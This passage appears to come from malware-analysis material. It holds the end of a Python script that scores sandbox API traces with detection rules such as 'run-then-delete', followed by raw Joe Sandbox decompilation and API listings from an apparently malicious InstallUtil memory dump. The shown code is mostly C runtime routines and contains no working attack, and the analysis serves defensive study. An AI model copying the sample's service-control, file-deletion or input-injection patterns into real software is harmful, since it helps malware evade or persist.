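• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 004063DF
• Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
• CloseHandle.KERNEL32(00000000,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 0040641F
• MoveFileW.KERNEL32(00000000,00000000), ref: 0040643C
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406477
"""
FUNC_417428 = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00416E21,00000000), ref: 00417437
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00416E21,00000000), ref: 0041744B
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 00417458
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00416E21,00000000), ref: 00417467
"""

if __name__ == "__main__":
    for name, text in (("E00414A98", FUNC_414A98), ("E00406335", FUNC_406335), ("E00417428", FUNC_417428)):
        print(name, triage(text))
```

Sorting by ref address is what makes the first rule fire: matched in listing order, ShellExecuteExA comes last and the run-then-delete sequence is missed. Calls tagged "Part of subcall function" carry the callee's addresses, so they are excluded from ordering and only used for flat checks such as the `send` status report.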

                                                                      C-Code - Quality: 69%
                                                                      			E00445AD5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				void* _v24;
                                                                      				signed int _t49;
                                                                      				signed int _t54;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				short* _t62;
                                                                      				signed int _t66;
                                                                      				short* _t70;
                                                                      				int _t71;
                                                                      				int _t78;
                                                                      				short* _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t90;
                                                                      				void* _t95;
                                                                      				void* _t96;
                                                                      				int _t98;
                                                                      				short* _t101;
                                                                      				int _t103;
                                                                      				signed int _t106;
                                                                      				short* _t107;
                                                                      				void* _t110;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t49 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t49 ^ _t106;
                                                                      				_push(__esi);
                                                                      				_t103 = _a20;
                                                                      				if(_t103 > 0) {
                                                                      					_t78 = E004427A6(_a16, _t103);
                                                                      					_t110 = _t78 - _t103;
                                                                      					_t4 = _t78 + 1; // 0x1
                                                                      					_t103 = _t4;
                                                                      					if(_t110 >= 0) {
                                                                      						_t103 = _t78;
                                                                      					}
                                                                      				}
                                                                      				_t98 = _a32;
                                                                      				if(_t98 == 0) {
                                                                      					_t98 =  *( *_a4 + 8);
                                                                      					_a32 = _t98;
                                                                      				}
                                                                      				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                      				_v12 = _t54;
                                                                      				if(_t54 == 0) {
                                                                      					L38:
                                                                      					return E004318FB(_v8 ^ _t106);
                                                                      				} else {
                                                                      					_t95 = _t54 + _t54;
                                                                      					_t85 = _t95 + 8;
                                                                      					asm("sbb eax, eax");
                                                                      					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                      						_t81 = 0;
                                                                      						__eflags = 0;
                                                                      						L14:
                                                                      						if(_t81 == 0) {
                                                                      							L36:
                                                                      							_t105 = 0;
                                                                      							L37:
                                                                      							E00432753(_t81);
                                                                      							goto L38;
                                                                      						}
                                                                      						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                      						_t121 = _t58;
                                                                      						if(_t58 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t100 = _v12;
                                                                      						_t60 = E00444BF3(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                                      						_t105 = _t60;
                                                                      						if(_t105 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						if((_a12 & 0x00000400) == 0) {
                                                                      							_t96 = _t105 + _t105;
                                                                      							_t87 = _t96 + 8;
                                                                      							__eflags = _t96 - _t87;
                                                                      							asm("sbb eax, eax");
                                                                      							__eflags = _t87 & _t60;
                                                                      							if((_t87 & _t60) == 0) {
                                                                      								_t101 = 0;
                                                                      								__eflags = 0;
                                                                      								L30:
                                                                      								__eflags = _t101;
                                                                      								if(__eflags == 0) {
                                                                      									L35:
                                                                      									E00432753(_t101);
                                                                      									goto L36;
                                                                      								}
                                                                      								_t62 = E00444BF3(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                      								__eflags = _t62;
                                                                      								if(_t62 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								__eflags = _a28;
                                                                      								if(_a28 != 0) {
                                                                      									_push(_a28);
                                                                      									_push(_a24);
                                                                      								} else {
                                                                      									_push(0);
                                                                      									_push(0);
                                                                      								}
                                                                      								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                      								__eflags = _t105;
                                                                      								if(_t105 != 0) {
                                                                      									E00432753(_t101);
                                                                      									goto L37;
                                                                      								} else {
                                                                      									goto L35;
                                                                      								}
                                                                      							}
                                                                      							_t90 = _t96 + 8;
                                                                      							__eflags = _t96 - _t90;
                                                                      							asm("sbb eax, eax");
                                                                      							_t66 = _t60 & _t90;
                                                                      							_t87 = _t96 + 8;
                                                                      							__eflags = _t66 - 0x400;
                                                                      							if(_t66 > 0x400) {
                                                                      								__eflags = _t96 - _t87;
                                                                      								asm("sbb eax, eax");
                                                                      								_t101 = E004421F7(_t87, _t66 & _t87);
                                                                      								_pop(_t87);
                                                                      								__eflags = _t101;
                                                                      								if(_t101 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								 *_t101 = 0xdddd;
                                                                      								L28:
                                                                      								_t101 =  &(_t101[4]);
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t96 - _t87;
                                                                      							asm("sbb eax, eax");
                                                                      							E00452F00();
                                                                      							_t101 = _t107;
                                                                      							__eflags = _t101;
                                                                      							if(_t101 == 0) {
                                                                      								goto L35;
                                                                      							}
                                                                      							 *_t101 = 0xcccc;
                                                                      							goto L28;
                                                                      						}
                                                                      						_t70 = _a28;
                                                                      						if(_t70 == 0) {
                                                                      							goto L37;
                                                                      						}
                                                                      						_t125 = _t105 - _t70;
                                                                      						if(_t105 > _t70) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t71 = E00444BF3(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                      						_t105 = _t71;
                                                                      						if(_t71 != 0) {
                                                                      							goto L37;
                                                                      						}
                                                                      						goto L36;
                                                                      					}
                                                                      					asm("sbb eax, eax");
                                                                      					_t72 = _t54 & _t95 + 0x00000008;
                                                                      					_t85 = _t95 + 8;
                                                                      					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                      						__eflags = _t95 - _t85;
                                                                      						asm("sbb eax, eax");
                                                                      						_t81 = E004421F7(_t85, _t72 & _t85);
                                                                      						_pop(_t85);
                                                                      						__eflags = _t81;
                                                                      						if(__eflags == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						 *_t81 = 0xdddd;
                                                                      						L12:
                                                                      						_t81 =  &(_t81[4]);
                                                                      						goto L14;
                                                                      					}
                                                                      					asm("sbb eax, eax");
                                                                      					E00452F00();
                                                                      					_t81 = _t107;
                                                                      					if(_t81 == 0) {
                                                                      						goto L36;
                                                                      					}
                                                                      					 *_t81 = 0xcccc;
                                                                      					goto L12;
                                                                      				}
                                                                      			}
                                                                      0x00445ada
                                                                      0x00445adb
                                                                      0x00445adc
                                                                      0x00445ae3
                                                                      0x00445ae7
                                                                      0x00445ae8
                                                                      0x00445aee
                                                                      0x00445af4
                                                                      0x00445afa
                                                                      0x00445afd
                                                                      0x00445afd
                                                                      0x00445b00
                                                                      0x00445b02
                                                                      0x00445b02
                                                                      0x00445b00
                                                                      0x00445b04
                                                                      0x00445b09
                                                                      0x00445b10
                                                                      0x00445b13
                                                                      0x00445b13
                                                                      0x00445b2f
                                                                      0x00445b35
                                                                      0x00445b3a
                                                                      0x00445ccd
                                                                      0x00445ce0
                                                                      0x00445b40
                                                                      0x00445b40
                                                                      0x00445b43
                                                                      0x00445b48
                                                                      0x00445b4c
                                                                      0x00445ba0
                                                                      0x00445ba0
                                                                      0x00445ba2
                                                                      0x00445ba4
                                                                      0x00445cc2
                                                                      0x00445cc2
                                                                      0x00445cc4
                                                                      0x00445cc5
                                                                      0x00000000
                                                                      0x00445ccb
                                                                      0x00445bb5
                                                                      0x00445bbb
                                                                      0x00445bbd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445bc3
                                                                      0x00445bd5
                                                                      0x00445bda
                                                                      0x00445bde
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445beb
                                                                      0x00445c25
                                                                      0x00445c28
                                                                      0x00445c2b
                                                                      0x00445c2d
                                                                      0x00445c2f
                                                                      0x00445c31
                                                                      0x00445c7d
                                                                      0x00445c7d
                                                                      0x00445c7f
                                                                      0x00445c7f
                                                                      0x00445c81
                                                                      0x00445cbb
                                                                      0x00445cbc
                                                                      0x00000000
                                                                      0x00445cc1
                                                                      0x00445c95
                                                                      0x00445c9a
                                                                      0x00445c9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445ca0
                                                                      0x00445ca1
                                                                      0x00445ca2
                                                                      0x00445ca5
                                                                      0x00445ce1
                                                                      0x00445ce4
                                                                      0x00445ca7
                                                                      0x00445ca7
                                                                      0x00445ca8
                                                                      0x00445ca8
                                                                      0x00445cb5
                                                                      0x00445cb7
                                                                      0x00445cb9
                                                                      0x00445cea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445cb9
                                                                      0x00445c33
                                                                      0x00445c36
                                                                      0x00445c38
                                                                      0x00445c3a
                                                                      0x00445c3c
                                                                      0x00445c3f
                                                                      0x00445c44
                                                                      0x00445c5f
                                                                      0x00445c61
                                                                      0x00445c6b
                                                                      0x00445c6d
                                                                      0x00445c6e
                                                                      0x00445c70
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445c72
                                                                      0x00445c78
                                                                      0x00445c78
                                                                      0x00000000
                                                                      0x00445c78
                                                                      0x00445c46
                                                                      0x00445c48
                                                                      0x00445c4c
                                                                      0x00445c51
                                                                      0x00445c53
                                                                      0x00445c55
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445c57
                                                                      0x00000000
                                                                      0x00445c57
                                                                      0x00445bed
                                                                      0x00445bf2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445bf8
                                                                      0x00445bfa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445c11
                                                                      0x00445c16
                                                                      0x00445c1a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445c20
                                                                      0x00445b53
                                                                      0x00445b55
                                                                      0x00445b57
                                                                      0x00445b5f
                                                                      0x00445b7e
                                                                      0x00445b80
                                                                      0x00445b8a
                                                                      0x00445b8c
                                                                      0x00445b8d
                                                                      0x00445b8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445b95
                                                                      0x00445b9b
                                                                      0x00445b9b
                                                                      0x00000000
                                                                      0x00445b9b
                                                                      0x00445b63
                                                                      0x00445b67
                                                                      0x00445b6c
                                                                      0x00445b70
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445b76
                                                                      0x00000000
                                                                      0x00445b76

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043CEA6,0043CEA6,?,?,?,00445D26,00000001,00000001,7EE85006), ref: 00445B2F
                                                                      • __alloca_probe_16.LIBCMT ref: 00445B67
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00445D26,00000001,00000001,7EE85006,?,?,?), ref: 00445BB5
                                                                      • __alloca_probe_16.LIBCMT ref: 00445C4C
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,7EE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00445CAF
                                                                      • __freea.LIBCMT ref: 00445CBC
                                                                        • Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229
                                                                      • __freea.LIBCMT ref: 00445CC5
                                                                      • __freea.LIBCMT ref: 00445CEA
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 3864826663-0
                                                                      • Opcode ID: 6c04ecc1949e56f0ffd47d20a20d3f6d347b1252d0043ebdfb42c54fcc1dfd9c
                                                                      • Instruction ID: 594a8b8c100fc5b4e580d96ac5553466fb607dcaecf2dc625855ed07f8f4da3e
                                                                      • Opcode Fuzzy Hash: 6c04ecc1949e56f0ffd47d20a20d3f6d347b1252d0043ebdfb42c54fcc1dfd9c
                                                                      • Instruction Fuzzy Hash: AB51E172600716ABFF258F65CC81EAF77A9EB44754F15462AFC05DB242EB38DC40C6A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004161C6
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004161E7
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00416207
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041621B
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00416231
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 0041624E
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00416269
                                                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00416285
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InputSend
                                                                      • String ID:
                                                                      • API String ID: 3431551938-0
                                                                      • Opcode ID: 12786c4cafe0b8a23b25c8da6f4de9c7c0ef2038655d50f1abea837446537b14
                                                                      • Instruction ID: a02611773dfd50ea6d7010240faf607bce085a1ae0f4f5925b3690c131d481f1
                                                                      • Opcode Fuzzy Hash: 12786c4cafe0b8a23b25c8da6f4de9c7c0ef2038655d50f1abea837446537b14
                                                                      • Instruction Fuzzy Hash: 44319E31548308AAE311CF51D841BEBBBDCEF98B54F00080FF6808A191D2A6D5C88BA7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E004435B1(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                                                                      				signed int _v8;
                                                                      				short _v10;
                                                                      				short _v12;
                                                                      				short _v14;
                                                                      				short _v16;
                                                                      				short _v18;
                                                                      				short _v22;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int* _v32;
                                                                      				signed int _v33;
                                                                      				signed int** _v40;
                                                                      				intOrPtr _v44;
                                                                      				intOrPtr* _v48;
                                                                      				char _v52;
                                                                      				void* _v64;
                                                                      				signed int _t86;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				void* _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t102;
                                                                      				signed int _t103;
                                                                      				signed int _t104;
                                                                      				intOrPtr _t105;
                                                                      				signed int _t110;
                                                                      				void* _t111;
                                                                      				signed int _t116;
                                                                      				signed int _t117;
                                                                      				signed int _t129;
                                                                      				void* _t133;
                                                                      				signed int _t135;
                                                                      				intOrPtr _t143;
                                                                      				signed short* _t144;
                                                                      				intOrPtr _t145;
                                                                      				signed int** _t146;
                                                                      				signed int _t147;
                                                                      				signed int* _t148;
                                                                      				signed int _t149;
                                                                      				signed int _t152;
                                                                      				signed short** _t154;
                                                                      				signed int _t155;
                                                                      				signed int _t159;
                                                                      				signed int _t163;
                                                                      				intOrPtr* _t171;
                                                                      				signed short _t172;
                                                                      				signed short* _t173;
                                                                      				signed int** _t174;
                                                                      				void* _t175;
                                                                      				void* _t177;
                                                                      				signed short* _t179;
                                                                      				intOrPtr* _t180;
                                                                      				intOrPtr* _t181;
                                                                      				signed int* _t183;
                                                                      				signed int _t184;
                                                                      				signed int** _t185;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				signed int _t188;
                                                                      
                                                                      				_t149 = __ecx;
                                                                      				_t86 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t86 ^ _t187;
                                                                      				_t171 = _a12;
                                                                      				_v52 = _a4;
                                                                      				_t143 = _a24;
                                                                      				_v40 = _a16;
                                                                      				_v48 = _t171;
                                                                      				_v44 = _t143;
                                                                      				_t183 = _a20;
                                                                      				_v32 = _t183;
                                                                      				_t91 = _a8;
                                                                      				if(_t91 == 0) {
                                                                      					_t179 =  *(_t143 + 0x154);
                                                                      				} else {
                                                                      					if(_t91 == 1) {
                                                                      						_t179 =  *(_t143 + 0x158);
                                                                      					} else {
                                                                      						_t179 =  *(_t143 + 0x15c);
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                                                                      					goto L113;
                                                                      				} else {
                                                                      					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                                                                      					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                                                                      					_v33 = _t163;
                                                                      					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                                                                      					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                                                                      					_v16 =  *((intOrPtr*)(_t171 + 8));
                                                                      					_v14 =  *((intOrPtr*)(_t171 + 4));
                                                                      					_v12 =  *_t171;
                                                                      					_v10 = 0;
                                                                      					_t194 = _t163;
                                                                      					if(_t163 == 0) {
                                                                      						__eflags = 0;
                                                                      						_t129 = E004448AB(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
                                                                      					} else {
                                                                      						_t129 = E004449ED(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
                                                                      					}
                                                                      					_t147 = _t129;
                                                                      					if(_t147 == 0) {
                                                                      						goto L113;
                                                                      					} else {
                                                                      						_t175 = _t147 + _t147;
                                                                      						_t165 = _t175 + 8;
                                                                      						asm("sbb eax, eax");
                                                                      						if((_t175 + 0x00000008 & _t129) == 0) {
                                                                      							_t184 = 0;
                                                                      							__eflags = 0;
                                                                      							L18:
                                                                      							_v28 = _t184;
                                                                      							if(_t184 == 0) {
                                                                      								L30:
                                                                      								E00432753(0);
                                                                      								_t183 = _v32;
                                                                      								while(1) {
                                                                      									L113:
                                                                      									_t172 =  *_t179 & 0x0000ffff;
                                                                      									__eflags = _t172;
                                                                      									if(_t172 == 0) {
                                                                      										break;
                                                                      									}
                                                                      									__eflags =  *_t183;
                                                                      									if( *_t183 == 0) {
                                                                      										L28:
                                                                      										L29:
                                                                      										return E004318FB(_v8 ^ _t187);
                                                                      									}
                                                                      									_v32 = 0;
                                                                      									_t152 = 0;
                                                                      									__eflags = 0;
                                                                      									_v28 = _t179;
                                                                      									_t144 = _t179;
                                                                      									_t94 = _t172 & 0x0000ffff;
                                                                      									do {
                                                                      										_t144 =  &(_t144[1]);
                                                                      										_t152 = _t152 + 1;
                                                                      										__eflags =  *_t144 - _t94;
                                                                      									} while ( *_t144 == _t94);
                                                                      									_t95 = _t172 & 0x0000ffff;
                                                                      									_v28 = _t144;
                                                                      									_t145 = _v44;
                                                                      									__eflags = _t95 - 0x64;
                                                                      									if(__eflags > 0) {
                                                                      										_t96 = _t95 - 0x68;
                                                                      										__eflags = _t96;
                                                                      										if(_t96 == 0) {
                                                                      											_t153 = _t152 - 1;
                                                                      											__eflags = _t153;
                                                                      											if(_t153 == 0) {
                                                                      												_v32 = 1;
                                                                      												L110:
                                                                      												_push(0x49);
                                                                      												L111:
                                                                      												_pop(_t97);
                                                                      												_t84 =  &_v52; // 0x443b28
                                                                      												_t98 = E0044297B(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
                                                                      												_t188 = _t188 + 0x1c;
                                                                      												__eflags = _t98;
                                                                      												if(_t98 == 0) {
                                                                      													 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      													goto L29;
                                                                      												}
                                                                      												L112:
                                                                      												_t179 = _v28;
                                                                      												continue;
                                                                      											}
                                                                      											_t153 = _t153 - 1;
                                                                      											__eflags = _t153;
                                                                      											if(_t153 == 0) {
                                                                      												goto L110;
                                                                      											}
                                                                      											L108:
                                                                      											_t154 = _v40;
                                                                      											_t179 =  &(_t179[1]);
                                                                      											 *( *_t154) = _t172;
                                                                      											 *_t154 =  &(( *_t154)[1]);
                                                                      											 *_t183 =  *_t183 - 1;
                                                                      											continue;
                                                                      										}
                                                                      										_t102 = _t96 - 5;
                                                                      										__eflags = _t102;
                                                                      										if(_t102 == 0) {
                                                                      											_t153 = _t152 - 1;
                                                                      											__eflags = _t153;
                                                                      											if(_t153 == 0) {
                                                                      												_v32 = 1;
                                                                      												L105:
                                                                      												_push(0x4d);
                                                                      												goto L111;
                                                                      											}
                                                                      											_t153 = _t153 - 1;
                                                                      											__eflags = _t153;
                                                                      											if(_t153 == 0) {
                                                                      												goto L105;
                                                                      											}
                                                                      											goto L108;
                                                                      										}
                                                                      										_t103 = _t102 - 6;
                                                                      										__eflags = _t103;
                                                                      										if(_t103 == 0) {
                                                                      											_t153 = _t152 - 1;
                                                                      											__eflags = _t153;
                                                                      											if(_t153 == 0) {
                                                                      												_v32 = 1;
                                                                      												L100:
                                                                      												_push(0x53);
                                                                      												goto L111;
                                                                      											}
                                                                      											_t153 = _t153 - 1;
                                                                      											__eflags = _t153;
                                                                      											if(_t153 == 0) {
                                                                      												goto L100;
                                                                      											}
                                                                      											goto L108;
                                                                      										}
                                                                      										_t104 = _t103 - 1;
                                                                      										__eflags = _t104;
                                                                      										if(_t104 == 0) {
                                                                      											_t105 = _v48;
                                                                      											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                                                                      											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                                                                      												_t173 =  *(_t145 + 0x150);
                                                                      											} else {
                                                                      												_t173 =  *(_t145 + 0x14c);
                                                                      											}
                                                                      											__eflags = _t152 - 1;
                                                                      											if(_t152 != 1) {
                                                                      												L91:
                                                                      												_t155 =  *_t173 & 0x0000ffff;
                                                                      												__eflags = _t155;
                                                                      												if(_t155 == 0) {
                                                                      													goto L112;
                                                                      												}
                                                                      												_t146 = _v40;
                                                                      												while(1) {
                                                                      													__eflags =  *_t183;
                                                                      													if( *_t183 <= 0) {
                                                                      														goto L112;
                                                                      													}
                                                                      													_t173 =  &(_t173[1]);
                                                                      													 *( *_t146) = _t155;
                                                                      													 *_t146 =  &(( *_t146)[0]);
                                                                      													 *_t183 =  *_t183 - 1;
                                                                      													_t155 =  *_t173 & 0x0000ffff;
                                                                      													__eflags = _t155;
                                                                      													if(_t155 != 0) {
                                                                      														continue;
                                                                      													}
                                                                      													goto L112;
                                                                      												}
                                                                      											} else {
                                                                      												__eflags =  *_t183;
                                                                      												if( *_t183 <= 0) {
                                                                      													goto L91;
                                                                      												}
                                                                      												_t180 = _v40;
                                                                      												 *((short*)( *_t180)) =  *_t173;
                                                                      												 *_t180 =  *_t180 + 2;
                                                                      												 *_t183 =  *_t183 - 1;
                                                                      											}
                                                                      											goto L112;
                                                                      										}
                                                                      										__eflags = _t104 != 5;
                                                                      										if(_t104 != 5) {
                                                                      											goto L108;
                                                                      										}
                                                                      										_t153 = _t152;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											_push(0x79);
                                                                      											goto L111;
                                                                      										}
                                                                      										_t153 = _t153;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 != 0) {
                                                                      											goto L108;
                                                                      										}
                                                                      										_push(0x59);
                                                                      										goto L111;
                                                                      									}
                                                                      									if(__eflags == 0) {
                                                                      										_t153 = _t152 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											_v32 = 1;
                                                                      											L75:
                                                                      											_push(0x64);
                                                                      											goto L111;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											goto L75;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											_push(0x61);
                                                                      											goto L111;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 != 0) {
                                                                      											goto L108;
                                                                      										}
                                                                      										_push(0x41);
                                                                      										goto L111;
                                                                      									}
                                                                      									__eflags = _t95 - 0x27;
                                                                      									if(_t95 == 0x27) {
                                                                      										_t110 = _t152 & 0x80000001;
                                                                      										__eflags = _t110;
                                                                      										if(__eflags < 0) {
                                                                      											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                                                                      										}
                                                                      										_t179 =  &(_t179[_t152]);
                                                                      										if(__eflags == 0) {
                                                                      											_t159 =  *_t179 & 0x0000ffff;
                                                                      											__eflags = _t159;
                                                                      											if(_t159 == 0) {
                                                                      												goto L28;
                                                                      											}
                                                                      											_t174 = _v40;
                                                                      											while(1) {
                                                                      												__eflags =  *_t183;
                                                                      												if( *_t183 == 0) {
                                                                      													goto L113;
                                                                      												}
                                                                      												_t111 = 0x27;
                                                                      												_t179 =  &(_t179[1]);
                                                                      												__eflags = _t159 - _t111;
                                                                      												if(_t159 == _t111) {
                                                                      													goto L113;
                                                                      												}
                                                                      												 *( *_t174) = _t159;
                                                                      												 *_t174 =  &(( *_t174)[0]);
                                                                      												 *_t183 =  *_t183 - 1;
                                                                      												_t159 =  *_t179 & 0x0000ffff;
                                                                      												__eflags = _t159;
                                                                      												if(_t159 != 0) {
                                                                      													continue;
                                                                      												}
                                                                      												goto L113;
                                                                      											}
                                                                      										}
                                                                      										continue;
                                                                      									}
                                                                      									__eflags = _t95 - 0x41;
                                                                      									if(_t95 == 0x41) {
                                                                      										L41:
                                                                      										_t116 = E0044F785(_t145, _t179, _t183, _t179, L"am/pm");
                                                                      										__eflags = _t116;
                                                                      										if(_t116 != 0) {
                                                                      											_t117 = E0044F785(_t145, _t179, _t183, _t179, L"a/p");
                                                                      											_pop(_t153);
                                                                      											__eflags = _t117;
                                                                      											if(_t117 == 0) {
                                                                      												_v28 =  &(_t179[3]);
                                                                      											}
                                                                      										} else {
                                                                      											_t153 =  &(_t179[5]);
                                                                      											_v28 =  &(_t179[5]);
                                                                      										}
                                                                      										_push(0x70);
                                                                      										goto L111;
                                                                      									}
                                                                      									__eflags = _t95 - 0x48;
                                                                      									if(_t95 == 0x48) {
                                                                      										_t153 = _t152 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											_v32 = 1;
                                                                      											L55:
                                                                      											_push(0x48);
                                                                      											goto L111;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											goto L55;
                                                                      										}
                                                                      										goto L108;
                                                                      									}
                                                                      									__eflags = _t95 - 0x4d;
                                                                      									if(_t95 == 0x4d) {
                                                                      										_t153 = _t152 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											_v32 = 1;
                                                                      											L50:
                                                                      											_push(0x6d);
                                                                      											goto L111;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											goto L50;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 == 0) {
                                                                      											_push(0x62);
                                                                      											goto L111;
                                                                      										}
                                                                      										_t153 = _t153 - 1;
                                                                      										__eflags = _t153;
                                                                      										if(_t153 != 0) {
                                                                      											goto L108;
                                                                      										}
                                                                      										_push(0x42);
                                                                      										goto L111;
                                                                      									}
                                                                      									__eflags = _t95 - 0x61;
                                                                      									if(_t95 != 0x61) {
                                                                      										goto L108;
                                                                      									}
                                                                      									goto L41;
                                                                      								}
                                                                      								goto L28;
                                                                      							}
                                                                      							_t203 = _v33;
                                                                      							if(_v33 == 0) {
                                                                      								_t133 = E004448AB(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                                                                      							} else {
